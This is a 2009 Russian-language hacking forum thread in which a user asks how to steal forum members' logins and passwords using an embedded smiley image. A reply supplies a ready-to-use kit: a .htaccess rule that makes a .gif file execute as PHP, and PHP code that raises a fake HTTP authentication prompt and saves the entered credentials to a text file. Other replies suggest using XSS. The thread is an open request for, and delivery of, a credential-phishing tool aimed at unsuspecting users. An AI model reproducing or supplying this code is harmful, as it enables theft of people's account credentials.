Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   [help] Сбор паролей с помощью смайлов (https://forum.antichat.xyz/showthread.php?t=157437)

mixdw 18.11.2009 05:30
[help] Сбор паролей с помощью смайлов
 
Доброго времени суток всем.

Давно где-то тут наткнулся на статью или сообщение,не помню точно.
Где описывалось,что вставляя в код картинки определённый код и затем в сообщениях на форумах после того как пользователь увидел этот смайл,то у него вытелао окно где просило ввести логин и пароль,после чего логин и пароль сохранялся у меня.

Облазил всю ветку статей,но не нашёл этого.
Может кто-нибудь даст ссылку на это чудо.

erihtoney 18.11.2009 06:27
forum.xakep.ru/m_1397502/tm.htm
forum.xakep.ru/m_1212796/tm.htm
про права на файлы не забудь.

mixdw 18.11.2009 06:58
Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.

erihtoney 18.11.2009 07:12
В чем проблема?
Ищи xss и в бой.

mixdw 18.11.2009 07:20
Увы с xss не знаком и не хочу заниматься тем чем не знаком.
Решил попроще что-нибудь,т.е. то что в первом посту.

d_x 18.11.2009 13:33
Цитата:
Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.

mixdw 19.11.2009 15:16
Цитата:
Сообщение от d_x
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
при переходе на картинку с кодом image.gif выдаёт ошибку,что невозможно открыть файл.

imajo.ati 20.11.2009 10:23
потому что твой веб-сервер должен этот файл как php-скрипт обработать.
у тебя ведь апаче? используй mod_rewrite или директиву AddType

mixdw 21.11.2009 07:14
у меня vertrigo.
используй mod_rewrite или директиву AddType
А поточнее,это куда вписывать надо?
Хотя раньше у меня вот этот смайл запускался на вертриго или я ошибаюсь,может то не вертриго был.

satana-fu 21.11.2009 10:58
создаешь 3 файла:

1..htaccess
содержимое
PHP код:
<files "image.gif">
AddType application/x-httpd-php .gif
</files
2.image.gif
содержимое
PHP код:
<?
    $filevalid    'accs.txt';
    $good        fopen($filevalid'a+');
header("WWW-Authenticate: Basic realm=\"Access Forbidden\"");
header("HTTP/1.0 401 Access Forbidden");
if (isset($_SERVER["PHP_AUTH_USER"]) ) {
$user $_SERVER["PHP_AUTH_USER"];
$pass $_SERVER["PHP_AUTH_PW"];
fwrite ($good$user.';'.$pass."\n");
header("HTTP/1.0 200 Login");
//exit("test");
}

?>
3.accs.txt
пустой

Заливаешь на сервак и проставляешь права файлу accs.txt. Тут готовый тестовый вариант.
Вроде все.


Время: 06:00
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице